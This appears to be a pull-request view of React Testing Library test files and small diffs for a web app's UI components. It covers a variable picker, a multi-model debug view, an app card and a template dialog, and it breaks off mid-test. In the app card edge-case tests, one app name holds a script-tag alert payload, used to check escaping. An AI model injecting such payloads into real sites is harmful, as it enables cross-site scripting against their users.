import * as React from 'react'
import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import VarPicker, { type Props } from './var-picker'
// Mock external dependencies only
jest.mock('next/navigation', () => ({
useRouter: () => ({ push: jest.fn() }),
usePathname: () => '/test',
}))
type PortalToFollowElemProps = {
children: React.ReactNode
open?: boolean
onOpenChange?: (open: boolean) => void
}
type PortalToFollowElemTriggerProps = React.HTMLAttributes<HTMLElement> & { children?: React.ReactNode; asChild?: boolean }
type PortalToFollowElemContentProps = React.HTMLAttributes<HTMLDivElement> & { children?: React.ReactNode }
jest.mock('@/app/components/base/portal-to-follow-elem', () => {
const PortalContext = React.createContext({ open: false })
const PortalToFollowElem = ({ children, open }: PortalToFollowElemProps) => {
return (
<PortalContext.Provider value={{ open: !!open }}>
<div data-testid="portal">{children}</div>
</PortalContext.Provider>
)
}
const PortalToFollowElemContent = ({ children, ...props }: PortalToFollowElemContentProps) => {
const { open } = React.useContext(PortalContext)
if (!open) return null
return (
<div data-testid="portal-content" {...props}>
{children}
</div>
)
}
const PortalToFollowElemTrigger = ({ children, asChild, ...props }: PortalToFollowElemTriggerProps) => {
if (asChild && React.isValidElement(children)) {
return React.cloneElement(children, {
...props,
'data-testid': 'portal-trigger',
} as React.HTMLAttributes<HTMLElement>)
}
return (
<div data-testid="portal-trigger" {...props}>
{children}
</div>
)
}
return {
PortalToFollowElem,
PortalToFollowElemContent,
PortalToFollowElemTrigger,
}
})
describe('VarPicker', () => {
const mockOptions: Props['options'] = [
{ name: 'Variable 1', value: 'var1', type: 'string' },
{ name: 'Variable 2', value: 'var2', type: 'number' },
{ name: 'Variable 3', value: 'var3', type: 'boolean' },
]
const defaultProps: Props = {
value: 'var1',
options: mockOptions,
onChange: jest.fn(),
}
beforeEach(() => {
jest.clearAllMocks()
})
// Rendering tests (REQUIRED)
describe('Rendering', () => {
it('should render variable picker with dropdown trigger', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByTestId('portal-trigger')).toBeInTheDocument()
expect(screen.getByText('var1')).toBeInTheDocument()
})
it('should display selected variable with type icon when value is provided', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByText('var1')).toBeInTheDocument()
expect(screen.getByText('{{')).toBeInTheDocument()
expect(screen.getByText('}}')).toBeInTheDocument()
// IconTypeIcon should be rendered (check for svg icon)
expect(document.querySelector('svg')).toBeInTheDocument()
})
it('should show placeholder text when no value is selected', () => {
// Arrange
const props = {
...defaultProps,
value: undefined,
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.queryByText('var1')).not.toBeInTheDocument()
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
})
it('should display custom tip message when notSelectedVarTip is provided', () => {
// Arrange
const props = {
...defaultProps,
value: undefined,
notSelectedVarTip: 'Select a variable',
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByText('Select a variable')).toBeInTheDocument()
})
it('should render dropdown indicator icon', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<VarPicker {...props} />)
// Assert - Trigger should be present
expect(screen.getByTestId('portal-trigger')).toBeInTheDocument()
})
})
// Props tests (REQUIRED)
describe('Props', () => {
it('should apply custom className to wrapper', () => {
// Arrange
const props = {
...defaultProps,
className: 'custom-class',
}
// Act
const { container } = render(<VarPicker {...props} />)
// Assert
expect(container.querySelector('.custom-class')).toBeInTheDocument()
})
it('should apply custom triggerClassName to trigger button', () => {
// Arrange
const props = {
...defaultProps,
triggerClassName: 'custom-trigger-class',
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByTestId('portal-trigger')).toHaveClass('custom-trigger-class')
})
it('should display selected value with proper formatting', () => {
// Arrange
const props = {
...defaultProps,
value: 'customVar',
options: [
{ name: 'Custom Variable', value: 'customVar', type: 'string' },
],
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByText('customVar')).toBeInTheDocument()
expect(screen.getByText('{{')).toBeInTheDocument()
expect(screen.getByText('}}')).toBeInTheDocument()
})
})
// User Interactions
describe('User Interactions', () => {
it('should open dropdown when clicking the trigger button', async () => {
// Arrange
const onChange = jest.fn()
const props = { ...defaultProps, onChange }
const user = userEvent.setup()
// Act
render(<VarPicker {...props} />)
await user.click(screen.getByTestId('portal-trigger'))
// Assert
expect(screen.getByTestId('portal-content')).toBeInTheDocument()
})
it('should call onChange and close dropdown when selecting an option', async () => {
// Arrange
const onChange = jest.fn()
const props = { ...defaultProps, onChange }
const user = userEvent.setup()
// Act
render(<VarPicker {...props} />)
// Open dropdown
await user.click(screen.getByTestId('portal-trigger'))
expect(screen.getByTestId('portal-content')).toBeInTheDocument()
// Select a different option
const options = screen.getAllByText('var2')
expect(options.length).toBeGreaterThan(0)
await user.click(options[0])
// Assert
expect(onChange).toHaveBeenCalledWith('var2')
expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument()
})
it('should toggle dropdown when clicking trigger button multiple times', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<VarPicker {...props} />)
const trigger = screen.getByTestId('portal-trigger')
// Open dropdown
await user.click(trigger)
expect(screen.getByTestId('portal-content')).toBeInTheDocument()
// Close dropdown
await user.click(trigger)
expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument()
})
})
// State Management
describe('State Management', () => {
it('should initialize with closed dropdown', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument()
})
it('should toggle dropdown state on trigger click', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<VarPicker {...props} />)
const trigger = screen.getByTestId('portal-trigger')
expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument()
// Open dropdown
await user.click(trigger)
expect(screen.getByTestId('portal-content')).toBeInTheDocument()
// Close dropdown
await user.click(trigger)
expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument()
})
it('should preserve selected value when dropdown is closed without selection', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<VarPicker {...props} />)
// Open and close dropdown without selecting anything
const trigger = screen.getByTestId('portal-trigger')
await user.click(trigger)
await user.click(trigger)
// Assert
expect(screen.getByText('var1')).toBeInTheDocument() // Original value still displayed
})
})
// Edge Cases (REQUIRED)
describe('Edge Cases', () => {
it('should handle undefined value gracefully', () => {
// Arrange
const props = {
...defaultProps,
value: undefined,
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
expect(screen.getByTestId('portal-trigger')).toBeInTheDocument()
})
it('should handle empty options array', () => {
// Arrange
const props = {
...defaultProps,
options: [],
value: undefined,
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByTestId('portal-trigger')).toBeInTheDocument()
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
})
it('should handle null value without crashing', () => {
// Arrange
const props = {
...defaultProps,
value: undefined,
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
})
it('should handle variable names with special characters safely', () => {
// Arrange
const props = {
...defaultProps,
options: [
{ name: 'Variable with & < > " \' characters', value: 'specialVar', type: 'string' },
],
value: 'specialVar',
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByText('specialVar')).toBeInTheDocument()
})
it('should handle long variable names', () => {
// Arrange
const props = {
...defaultProps,
options: [
{ name: 'A very long variable name that should be truncated', value: 'longVar', type: 'string' },
],
value: 'longVar',
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByText('longVar')).toBeInTheDocument()
expect(screen.getByTestId('portal-trigger')).toBeInTheDocument()
})
})
})

View File

@ -51,12 +51,6 @@ const mockFiles: FileEntity[] = [
},
]
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
jest.mock('@/context/debug-configuration', () => ({
__esModule: true,
useDebugConfigurationContext: () => mockUseDebugConfigurationContext(),
@ -206,6 +200,218 @@ describe('DebugWithMultipleModel', () => {
mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration())
})
describe('edge cases and error handling', () => {
it('should handle empty multipleModelConfigs array', () => {
renderComponent({ multipleModelConfigs: [] })
expect(screen.queryByTestId('debug-item')).not.toBeInTheDocument()
expect(screen.getByTestId('chat-input-area')).toBeInTheDocument()
})
it('should handle model config with missing required fields', () => {
const incompleteConfig = { id: 'incomplete' } as ModelAndParameter
renderComponent({ multipleModelConfigs: [incompleteConfig] })
expect(screen.getByTestId('debug-item')).toBeInTheDocument()
})
it('should handle more than 4 model configs', () => {
const manyConfigs = Array.from({ length: 6 }, () => createModelAndParameter())
renderComponent({ multipleModelConfigs: manyConfigs })
const items = screen.getAllByTestId('debug-item')
expect(items).toHaveLength(6)
// Items beyond 4 should not have specialized positioning
items.slice(4).forEach((item) => {
expect(item.style.transform).toBe('translateX(0) translateY(0)')
})
})
it('should handle modelConfig with undefined prompt_variables', () => {
// Note: The current component doesn't handle undefined/null prompt_variables gracefully
// This test documents the current behavior
const modelConfig = createModelConfig()
modelConfig.configs.prompt_variables = undefined as any
mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration({
modelConfig,
}))
expect(() => renderComponent()).toThrow('Cannot read properties of undefined (reading \'filter\')')
})
it('should handle modelConfig with null prompt_variables', () => {
// Note: The current component doesn't handle undefined/null prompt_variables gracefully
// This test documents the current behavior
const modelConfig = createModelConfig()
modelConfig.configs.prompt_variables = null as any
mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration({
modelConfig,
}))
expect(() => renderComponent()).toThrow('Cannot read properties of null (reading \'filter\')')
})
it('should handle prompt_variables with missing required fields', () => {
const incompleteVariables: PromptVariableWithMeta[] = [
{ key: '', name: 'Empty Key', type: 'string' }, // Empty key
{ key: 'valid-key', name: undefined as any, type: 'number' }, // Undefined name
{ key: 'no-type', name: 'No Type', type: undefined as any }, // Undefined type
]
const debugConfiguration = createDebugConfiguration({
modelConfig: createModelConfig(incompleteVariables),
})
mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration)
renderComponent()
// Should still render but handle gracefully
expect(screen.getByTestId('chat-input-area')).toBeInTheDocument()
expect(capturedChatInputProps?.inputsForm).toHaveLength(3)
})
})
describe('props and callbacks', () => {
it('should call onMultipleModelConfigsChange when provided', () => {
const onMultipleModelConfigsChange = jest.fn()
renderComponent({ onMultipleModelConfigsChange })
// Context provider should pass through the callback
expect(onMultipleModelConfigsChange).not.toHaveBeenCalled()
})
it('should call onDebugWithMultipleModelChange when provided', () => {
const onDebugWithMultipleModelChange = jest.fn()
renderComponent({ onDebugWithMultipleModelChange })
// Context provider should pass through the callback
expect(onDebugWithMultipleModelChange).not.toHaveBeenCalled()
})
it('should not memoize when props change', () => {
const props1 = createProps({ multipleModelConfigs: [createModelAndParameter({ id: 'model-1' })] })
const { rerender } = renderComponent(props1)
const props2 = createProps({ multipleModelConfigs: [createModelAndParameter({ id: 'model-2' })] })
rerender(<DebugWithMultipleModel {...props2} />)
const items = screen.getAllByTestId('debug-item')
expect(items[0]).toHaveAttribute('data-model-id', 'model-2')
})
})
describe('accessibility', () => {
it('should have accessible chat input elements', () => {
renderComponent()
const chatInput = screen.getByTestId('chat-input-area')
expect(chatInput).toBeInTheDocument()
// Check for button accessibility
const sendButton = screen.getByRole('button', { name: /send/i })
expect(sendButton).toBeInTheDocument()
const featureButton = screen.getByRole('button', { name: /feature/i })
expect(featureButton).toBeInTheDocument()
})
it('should apply ARIA attributes correctly', () => {
const multipleModelConfigs = [createModelAndParameter()]
renderComponent({ multipleModelConfigs })
// Debug items should be identifiable
const debugItem = screen.getByTestId('debug-item')
expect(debugItem).toBeInTheDocument()
expect(debugItem).toHaveAttribute('data-model-id')
})
})
describe('prompt variables transformation', () => {
it('should filter out API type variables', () => {
const promptVariables: PromptVariableWithMeta[] = [
{ key: 'normal', name: 'Normal', type: 'string' },
{ key: 'api-var', name: 'API Var', type: 'api' },
{ key: 'number', name: 'Number', type: 'number' },
]
const debugConfiguration = createDebugConfiguration({
modelConfig: createModelConfig(promptVariables),
})
mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration)
renderComponent()
expect(capturedChatInputProps?.inputsForm).toHaveLength(2)
expect(capturedChatInputProps?.inputsForm).toEqual(
expect.arrayContaining([
expect.objectContaining({ label: 'Normal', variable: 'normal' }),
expect.objectContaining({ label: 'Number', variable: 'number' }),
]),
)
expect(capturedChatInputProps?.inputsForm).not.toEqual(
expect.arrayContaining([
expect.objectContaining({ label: 'API Var' }),
]),
)
})
it('should handle missing hide and required properties', () => {
const promptVariables: Partial<PromptVariableWithMeta>[] = [
{ key: 'no-hide', name: 'No Hide', type: 'string', required: true },
{ key: 'no-required', name: 'No Required', type: 'number', hide: true },
]
const debugConfiguration = createDebugConfiguration({
modelConfig: createModelConfig(promptVariables as PromptVariableWithMeta[]),
})
mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration)
renderComponent()
expect(capturedChatInputProps?.inputsForm).toEqual([
expect.objectContaining({
label: 'No Hide',
variable: 'no-hide',
hide: false, // Should default to false
required: true,
}),
expect.objectContaining({
label: 'No Required',
variable: 'no-required',
hide: true,
required: false, // Should default to false
}),
])
})
it('should preserve original hide and required values', () => {
const promptVariables: PromptVariableWithMeta[] = [
{ key: 'hidden-optional', name: 'Hidden Optional', type: 'string', hide: true, required: false },
{ key: 'visible-required', name: 'Visible Required', type: 'number', hide: false, required: true },
]
const debugConfiguration = createDebugConfiguration({
modelConfig: createModelConfig(promptVariables),
})
mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration)
renderComponent()
expect(capturedChatInputProps?.inputsForm).toEqual([
expect.objectContaining({
label: 'Hidden Optional',
variable: 'hidden-optional',
hide: true,
required: false,
}),
expect.objectContaining({
label: 'Visible Required',
variable: 'visible-required',
hide: false,
required: true,
}),
])
})
})
describe('chat input rendering', () => {
it('should render chat input in chat mode with transformed prompt variables and feature handler', () => {
// Arrange
@ -326,6 +532,43 @@ describe('DebugWithMultipleModel', () => {
})
})
describe('performance optimization', () => {
it('should memoize callback functions correctly', () => {
const props = createProps({ multipleModelConfigs: [createModelAndParameter()] })
const { rerender } = renderComponent(props)
// First render
const firstItems = screen.getAllByTestId('debug-item')
expect(firstItems).toHaveLength(1)
// Rerender with exactly same props - should not cause re-renders
rerender(<DebugWithMultipleModel {...props} />)
const secondItems = screen.getAllByTestId('debug-item')
expect(secondItems).toHaveLength(1)
// Check that the element still renders the same content
expect(firstItems[0]).toHaveTextContent(secondItems[0].textContent || '')
})
it('should recalculate size and position when number of models changes', () => {
const { rerender } = renderComponent({ multipleModelConfigs: [createModelAndParameter()] })
// Single model - no special sizing
const singleItem = screen.getByTestId('debug-item')
expect(singleItem.style.width).toBe('')
// Change to 2 models
rerender(<DebugWithMultipleModel {...createProps({
multipleModelConfigs: [createModelAndParameter(), createModelAndParameter()],
})} />)
const twoItems = screen.getAllByTestId('debug-item')
expect(twoItems[0].style.width).toBe('calc(50% - 4px - 24px)')
expect(twoItems[1].style.width).toBe('calc(50% - 4px - 24px)')
})
})
describe('layout sizing and positioning', () => {
const expectItemLayout = (
element: HTMLElement,

View File

@ -0,0 +1,347 @@
import { render, screen, within } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import AppCard from './index'
import type { AppIconType } from '@/types/app'
import { AppModeEnum } from '@/types/app'
import type { App } from '@/models/explore'
jest.mock('@heroicons/react/20/solid', () => ({
PlusIcon: ({ className }: any) => <div data-testid="plus-icon" className={className} aria-label="Add icon">+</div>,
}))
const mockApp: App = {
app: {
id: 'test-app-id',
mode: AppModeEnum.CHAT,
icon_type: 'emoji' as AppIconType,
icon: '🤖',
icon_background: '#FFEAD5',
icon_url: '',
name: 'Test Chat App',
description: 'A test chat application for demonstration purposes',
use_icon_as_answer_icon: false,
},
app_id: 'test-app-id',
description: 'A comprehensive chat application template',
copyright: 'Test Corp',
privacy_policy: null,
custom_disclaimer: null,
category: 'Assistant',
position: 1,
is_listed: true,
install_count: 100,
installed: false,
editable: true,
is_agent: false,
}
describe('AppCard', () => {
const defaultProps = {
app: mockApp,
canCreate: true,
onCreate: jest.fn(),
}
beforeEach(() => {
jest.clearAllMocks()
})
describe('Rendering', () => {
it('should render without crashing', () => {
const { container } = render(<AppCard {...defaultProps} />)
expect(container.querySelector('em-emoji')).toBeInTheDocument()
expect(screen.getByText('Test Chat App')).toBeInTheDocument()
expect(screen.getByText(mockApp.description)).toBeInTheDocument()
})
it('should render app type icon and label', () => {
const { container } = render(<AppCard {...defaultProps} />)
expect(container.querySelector('svg')).toBeInTheDocument()
expect(screen.getByText('app.typeSelector.chatbot')).toBeInTheDocument()
})
})
describe('Props', () => {
describe('canCreate behavior', () => {
it('should show create button when canCreate is true', () => {
render(<AppCard {...defaultProps} canCreate={true} />)
const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ })
expect(button).toBeInTheDocument()
})
it('should hide create button when canCreate is false', () => {
render(<AppCard {...defaultProps} canCreate={false} />)
const button = screen.queryByRole('button', { name: /app\.newApp\.useTemplate/ })
expect(button).not.toBeInTheDocument()
})
})
it('should display app name from appBasicInfo', () => {
const customApp = {
...mockApp,
app: {
...mockApp.app,
name: 'Custom App Name',
},
}
render(<AppCard {...defaultProps} app={customApp} />)
expect(screen.getByText('Custom App Name')).toBeInTheDocument()
})
it('should display app description from app level', () => {
const customApp = {
...mockApp,
description: 'Custom description for the app',
}
render(<AppCard {...defaultProps} app={customApp} />)
expect(screen.getByText('Custom description for the app')).toBeInTheDocument()
})
it('should truncate long app names', () => {
const longNameApp = {
...mockApp,
app: {
...mockApp.app,
name: 'This is a very long app name that should be truncated with line-clamp-1',
},
}
render(<AppCard {...defaultProps} app={longNameApp} />)
const nameElement = screen.getByTitle('This is a very long app name that should be truncated with line-clamp-1')
expect(nameElement).toBeInTheDocument()
})
})
describe('App Modes - Data Driven Tests', () => {
const testCases = [
{
mode: AppModeEnum.CHAT,
expectedLabel: 'app.typeSelector.chatbot',
description: 'Chat application mode',
},
{
mode: AppModeEnum.AGENT_CHAT,
expectedLabel: 'app.typeSelector.agent',
description: 'Agent chat mode',
},
{
mode: AppModeEnum.COMPLETION,
expectedLabel: 'app.typeSelector.completion',
description: 'Completion mode',
},
{
mode: AppModeEnum.ADVANCED_CHAT,
expectedLabel: 'app.typeSelector.advanced',
description: 'Advanced chat mode',
},
{
mode: AppModeEnum.WORKFLOW,
expectedLabel: 'app.typeSelector.workflow',
description: 'Workflow mode',
},
]
testCases.forEach(({ mode, expectedLabel, description }) => {
it(`should display correct type label for ${description}`, () => {
const appWithMode = {
...mockApp,
app: {
...mockApp.app,
mode,
},
}
render(<AppCard {...defaultProps} app={appWithMode} />)
expect(screen.getByText(expectedLabel)).toBeInTheDocument()
})
})
})
describe('Icon Type Tests', () => {
it('should render emoji icon without image element', () => {
const appWithIcon = {
...mockApp,
app: {
...mockApp.app,
icon_type: 'emoji' as AppIconType,
icon: '🤖',
},
}
const { container } = render(<AppCard {...defaultProps} app={appWithIcon} />)
const card = container.firstElementChild as HTMLElement
expect(within(card).queryByRole('img', { name: 'app icon' })).not.toBeInTheDocument()
expect(card.querySelector('em-emoji')).toBeInTheDocument()
})
it('should prioritize icon_url when both icon and icon_url are provided', () => {
const appWithImageUrl = {
...mockApp,
app: {
...mockApp.app,
icon_type: 'image' as AppIconType,
icon: 'local-icon.png',
icon_url: 'https://example.com/remote-icon.png',
},
}
render(<AppCard {...defaultProps} app={appWithImageUrl} />)
expect(screen.getByRole('img', { name: 'app icon' })).toHaveAttribute('src', 'https://example.com/remote-icon.png')
})
})
describe('User Interactions', () => {
it('should call onCreate when create button is clicked', async () => {
const mockOnCreate = jest.fn()
render(<AppCard {...defaultProps} onCreate={mockOnCreate} />)
const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ })
await userEvent.click(button)
expect(mockOnCreate).toHaveBeenCalledTimes(1)
})
it('should handle click on card itself', async () => {
const mockOnCreate = jest.fn()
const { container } = render(<AppCard {...defaultProps} onCreate={mockOnCreate} />)
const card = container.firstElementChild as HTMLElement
await userEvent.click(card)
// Note: Card click doesn't trigger onCreate, only the button does
expect(mockOnCreate).not.toHaveBeenCalled()
})
})
describe('Keyboard Accessibility', () => {
it('should allow the create button to be focused', async () => {
const mockOnCreate = jest.fn()
render(<AppCard {...defaultProps} onCreate={mockOnCreate} />)
await userEvent.tab()
const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ }) as HTMLButtonElement
// Test that button can be focused
expect(button).toHaveFocus()
// Test click event works (keyboard events on buttons typically trigger click)
await userEvent.click(button)
expect(mockOnCreate).toHaveBeenCalledTimes(1)
})
})
describe('Edge Cases', () => {
it('should handle app with null icon_type', () => {
const appWithNullIcon = {
...mockApp,
app: {
...mockApp.app,
icon_type: null,
},
}
const { container } = render(<AppCard {...defaultProps} app={appWithNullIcon} />)
const appIcon = container.querySelector('em-emoji')
expect(appIcon).toBeInTheDocument()
// AppIcon component should handle null icon_type gracefully
})
it('should handle app with empty description', () => {
const appWithEmptyDesc = {
...mockApp,
description: '',
}
const { container } = render(<AppCard {...defaultProps} app={appWithEmptyDesc} />)
const descriptionContainer = container.querySelector('.line-clamp-3')
expect(descriptionContainer).toBeInTheDocument()
expect(descriptionContainer).toHaveTextContent('')
})
it('should handle app with very long description', () => {
const longDescription = 'This is a very long description that should be truncated with line-clamp-3. '.repeat(5)
const appWithLongDesc = {
...mockApp,
description: longDescription,
}
render(<AppCard {...defaultProps} app={appWithLongDesc} />)
expect(screen.getByText(/This is a very long description/)).toBeInTheDocument()
})
it('should handle app with special characters in name', () => {
const appWithSpecialChars = {
...mockApp,
app: {
...mockApp.app,
name: 'App <script>alert("test")</script> & Special "Chars"',
},
}
render(<AppCard {...defaultProps} app={appWithSpecialChars} />)
expect(screen.getByText('App <script>alert("test")</script> & Special "Chars"')).toBeInTheDocument()
})
it('should handle onCreate function throwing error', async () => {
const errorOnCreate = jest.fn(() => {
throw new Error('Create failed')
})
// Mock console.error to avoid test output noise
const consoleSpy = jest.spyOn(console, 'error').mockImplementation(jest.fn())
render(<AppCard {...defaultProps} onCreate={errorOnCreate} />)
const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ })
let capturedError: unknown
try {
await userEvent.click(button)
}
catch (err) {
capturedError = err
}
expect(errorOnCreate).toHaveBeenCalledTimes(1)
expect(consoleSpy).toHaveBeenCalled()
if (capturedError instanceof Error)
expect(capturedError.message).toContain('Create failed')
consoleSpy.mockRestore()
})
})
describe('Accessibility', () => {
it('should have proper elements for accessibility', () => {
const { container } = render(<AppCard {...defaultProps} />)
expect(container.querySelector('em-emoji')).toBeInTheDocument()
expect(container.querySelector('svg')).toBeInTheDocument()
})
it('should have title attribute for app name when truncated', () => {
render(<AppCard {...defaultProps} />)
const nameElement = screen.getByText('Test Chat App')
expect(nameElement).toHaveAttribute('title', 'Test Chat App')
})
it('should have accessible button with proper label', () => {
render(<AppCard {...defaultProps} />)
const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ })
expect(button).toBeEnabled()
expect(button).toHaveTextContent('app.newApp.useTemplate')
})
})
describe('User-Visible Behavior Tests', () => {
it('should show plus icon in create button', () => {
render(<AppCard {...defaultProps} />)
expect(screen.getByTestId('plus-icon')).toBeInTheDocument()
})
})
})

View File

@ -15,6 +15,7 @@ export type AppCardProps = {
const AppCard = ({
app,
canCreate,
onCreate,
}: AppCardProps) => {
const { t } = useTranslation()
@ -45,14 +46,16 @@ const AppCard = ({
{app.description}
</div>
</div>
<div className={cn('absolute bottom-0 left-0 right-0 hidden bg-gradient-to-t from-components-panel-gradient-2 from-[60.27%] to-transparent p-4 pt-8 group-hover:flex')}>
<div className={cn('flex h-8 w-full items-center space-x-2')}>
<Button variant='primary' className='grow' onClick={() => onCreate()}>
<PlusIcon className='mr-1 h-4 w-4' />
<span className='text-xs'>{t('app.newApp.useTemplate')}</span>
</Button>
{canCreate && (
<div className={cn('absolute bottom-0 left-0 right-0 hidden bg-gradient-to-t from-components-panel-gradient-2 from-[60.27%] to-transparent p-4 pt-8 group-hover:flex')}>
<div className={cn('flex h-8 w-full items-center space-x-2')}>
<Button variant='primary' className='grow' onClick={() => onCreate()}>
<PlusIcon className='mr-1 h-4 w-4' />
<span className='text-xs'>{t('app.newApp.useTemplate')}</span>
</Button>
</div>
</div>
</div>
)}
</div>
)
}

View File

@ -0,0 +1,287 @@
import { fireEvent, render, screen } from '@testing-library/react'
import CreateAppTemplateDialog from './index'
// Mock external dependencies (not base components)
jest.mock('./app-list', () => {
return function MockAppList({
onCreateFromBlank,
onSuccess,
}: {
onCreateFromBlank?: () => void
onSuccess: () => void
}) {
return (
<div data-testid="app-list">
<button data-testid="app-list-success" onClick={onSuccess}>
Success
</button>
{onCreateFromBlank && (
<button data-testid="create-from-blank" onClick={onCreateFromBlank}>
Create from Blank
</button>
)}
</div>
)
}
})
jest.mock('ahooks', () => ({
useKeyPress: jest.fn((key: string, callback: () => void) => {
// Mock implementation for testing
return jest.fn()
}),
}))
describe('CreateAppTemplateDialog', () => {
const defaultProps = {
show: false,
onSuccess: jest.fn(),
onClose: jest.fn(),
onCreateFromBlank: jest.fn(),
}
beforeEach(() => {
jest.clearAllMocks()
})
describe('Rendering', () => {
it('should not render when show is false', () => {
render(<CreateAppTemplateDialog {...defaultProps} />)
// FullScreenModal should not render any content when open is false
expect(screen.queryByRole('dialog')).not.toBeInTheDocument()
})
it('should render modal when show is true', () => {
render(<CreateAppTemplateDialog {...defaultProps} show={true} />)
// FullScreenModal renders with role="dialog"
expect(screen.getByRole('dialog')).toBeInTheDocument()
expect(screen.getByTestId('app-list')).toBeInTheDocument()
})
it('should render create from blank button when onCreateFromBlank is provided', () => {
render(<CreateAppTemplateDialog {...defaultProps} show={true} />)
expect(screen.getByTestId('create-from-blank')).toBeInTheDocument()
})
it('should not render create from blank button when onCreateFromBlank is not provided', () => {
const { onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps
render(<CreateAppTemplateDialog {...propsWithoutOnCreate} show={true} />)
expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument()
})
})
describe('Props', () => {
it('should pass show prop to FullScreenModal', () => {
const { rerender } = render(<CreateAppTemplateDialog {...defaultProps} />)
expect(screen.queryByRole('dialog')).not.toBeInTheDocument()
rerender(<CreateAppTemplateDialog {...defaultProps} show={true} />)
expect(screen.getByRole('dialog')).toBeInTheDocument()
})
it('should pass closable prop to FullScreenModal', () => {
// Since the FullScreenModal is always rendered with closable=true
// we can verify that the modal renders with the proper structure
render(<CreateAppTemplateDialog {...defaultProps} show={true} />)
// Verify that the modal has the proper dialog structure
const dialog = screen.getByRole('dialog')
expect(dialog).toBeInTheDocument()
expect(dialog).toHaveAttribute('aria-modal', 'true')
})
})
describe('User Interactions', () => {
it('should handle close interactions', () => {
const mockOnClose = jest.fn()
render(<CreateAppTemplateDialog {...defaultProps} show={true} onClose={mockOnClose} />)
// Test that the modal is rendered
const dialog = screen.getByRole('dialog')
expect(dialog).toBeInTheDocument()
// Test that AppList component renders (child component interactions)
expect(screen.getByTestId('app-list')).toBeInTheDocument()
expect(screen.getByTestId('app-list-success')).toBeInTheDocument()
})
it('should call both onSuccess and onClose when app list success is triggered', () => {
const mockOnSuccess = jest.fn()
const mockOnClose = jest.fn()
render(<CreateAppTemplateDialog
{...defaultProps}
show={true}
onSuccess={mockOnSuccess}
onClose={mockOnClose}
/>)
fireEvent.click(screen.getByTestId('app-list-success'))
expect(mockOnSuccess).toHaveBeenCalledTimes(1)
expect(mockOnClose).toHaveBeenCalledTimes(1)
})
it('should call onCreateFromBlank when create from blank is clicked', () => {
const mockOnCreateFromBlank = jest.fn()
render(<CreateAppTemplateDialog
{...defaultProps}
show={true}
onCreateFromBlank={mockOnCreateFromBlank}
/>)
fireEvent.click(screen.getByTestId('create-from-blank'))
expect(mockOnCreateFromBlank).toHaveBeenCalledTimes(1)
})
})
describe('useKeyPress Integration', () => {
it('should set up ESC key listener when modal is shown', () => {
const { useKeyPress } = require('ahooks')
render(<CreateAppTemplateDialog {...defaultProps} show={true} />)
expect(useKeyPress).toHaveBeenCalledWith('esc', expect.any(Function))
})
it('should handle ESC key press to close modal', () => {
const { useKeyPress } = require('ahooks')
let capturedCallback: (() => void) | undefined
useKeyPress.mockImplementation((key: string, callback: () => void) => {
if (key === 'esc')
capturedCallback = callback
return jest.fn()
})
const mockOnClose = jest.fn()
render(<CreateAppTemplateDialog
{...defaultProps}
show={true}
onClose={mockOnClose}
/>)
expect(capturedCallback).toBeDefined()
expect(typeof capturedCallback).toBe('function')
// Simulate ESC key press
capturedCallback?.()
expect(mockOnClose).toHaveBeenCalledTimes(1)
})
it('should not call onClose when ESC key is pressed and modal is not shown', () => {
const { useKeyPress } = require('ahooks')
let capturedCallback: (() => void) | undefined
useKeyPress.mockImplementation((key: string, callback: () => void) => {
if (key === 'esc')
capturedCallback = callback
return jest.fn()
})
const mockOnClose = jest.fn()
render(<CreateAppTemplateDialog
{...defaultProps}
show={false} // Modal not shown
onClose={mockOnClose}
/>)
// The callback should still be created but not execute onClose
expect(capturedCallback).toBeDefined()
// Simulate ESC key press
capturedCallback?.()
// onClose should not be called because modal is not shown
expect(mockOnClose).not.toHaveBeenCalled()
})
})
describe('Callback Dependencies', () => {
it('should create stable callback reference for ESC key handler', () => {
const { useKeyPress } = require('ahooks')
